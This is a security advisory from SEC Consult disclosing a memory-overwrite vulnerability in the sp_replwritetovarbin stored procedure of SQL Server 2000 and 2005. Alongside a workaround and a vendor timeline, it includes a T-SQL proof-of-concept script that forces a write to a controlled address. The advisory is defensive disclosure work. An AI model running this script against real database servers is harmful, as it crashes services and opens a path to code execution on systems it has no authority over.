Microsoft SQL Server sp_replwritetovarbin

SEC Consult Security Advisory < 20081209-0 >

=====================================================================================

title: Microsoft SQL Server sp_replwritetovarbin

limited memory overwrite vulnerability

program: Microsoft SQL Server 2000

Microsoft SQL Server 2005

vulnerable version: SQL Server 2000 (current version, tested on 8.00.2039)

SQL Server 2005 (current version, tested on 9.00.1399.06)

found: 04-12-2008

by: Bernhard Mueller (SEC Consult Vulnerability Lab)

perm. link: www.sec-consult.com/files/20081209_mssql-sp_replwritetovarbin_memwrite.txt

=====================================================================================

 

Product description:

---------------

 

Microsoft SQL Server is a relational database management system (RDBMS) produced by Microsoft. Its primary query language is Transact-SQL, an implementation of the ANSI/ISO standard Structured Query Language (SQL) used by both Microsoft and Sybase.

 

 

Vulnerabilty overview:

---------------

 

By calling the extended stored procedure sp_replwritetovarbin, and supplying several uninitialized variables as parameters, it is possible to trigger a memory write to a controlled location. Depending on the underlying Windows version, it is / may be possible to use this vulnerability to execute arbitrary code in the context of the vulnerable SQL server process.

In a default configuration, the sp_replwritetovarbin stored procedure is accessible by anyone. The vulnerability can be exploited by an authenticated user with a direct database connection, or via SQL injection in a vulnerable web application.

This vulnerability has been confirmed on SQL Server 2000/2005 (SQL Server 2008 has not been tested).

 

 

Vulnerability details:

---------------

 

The following T-SQL script can be used to test for the vulnerability:

 

--------------------------------
DECLARE @buf NVARCHAR(4000), 
@val NVARCHAR(4), 
@counter INT

SET @buf = '
declare @retcode int, 
@end_offset int, 
@vb_buffer varbinary,
@vb_bufferlen int, 
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1, 
  @end_offset output, 
  @vb_buffer output,
  @vb_bufferlen output,'''

SET @val = CHAR(0x41)

SET @counter = 0
WHILE @counter < 3000
BEGIN
  SET @counter = @counter + 1
  SET @buf = @buf + @val
END

SET @buf = @buf + ''',''1'',''1'',''1'',
''1'',''1'',''1'',''1'',''1'',''1'''

EXEC master..sp_executesql @buf
--------------------------------

 

 

This triggers an access violation exception (write to address 0x41414141).

The vulnerability has been successfully used to execute arbitrary code on a lab machine.

SEC Consult will not release code execution exploits for this vulnerability to the public.

 

 

Workaround:

-----------

 

Remove the sp_replwriterovarbin extended stored procedure. Run the following as an administrator:

 

execute dbo.sp_dropextendedproc 'sp_replwritetovarbin'

 

See also:

 

"Removing an Extended Stored Procedure from SQL Server"

msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx

 

 

Patch:

------

 

According to an email received by Microsoft in September, a fix for this vulnerability has been completed.

The release schedule for this fix is currently unknown.

 

 

Vendor timeline:

---------------

Vendor notified: 2008-04-17

Vendor response: 2008-04-17

Last response from Microsoft: 09-29-2008

Request for update status 1: 10-14-2008

Request for update status 2: 10-29-2008

Request for update status 3: 11-12-2008

Request for update status 4

and prenotification about advisory release date: 11-28-2008

Public release: 12-09-2008

Update (added SQL Server 2005, thanks Moreno Zilli): 12-10-2008

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Unternehmensberatung GmbH

 

Office Vienna

Mooslackengasse 17

A-1190 Vienna

Austria

 

Tel.: +43 / 1 / 890 30 43 - 0

Fax.: +43 / 1 / 890 30 43 - 25

Mail: research at sec-consult dot com

www.sec-consult.com

 

EOF Bernhard Mueller / @2008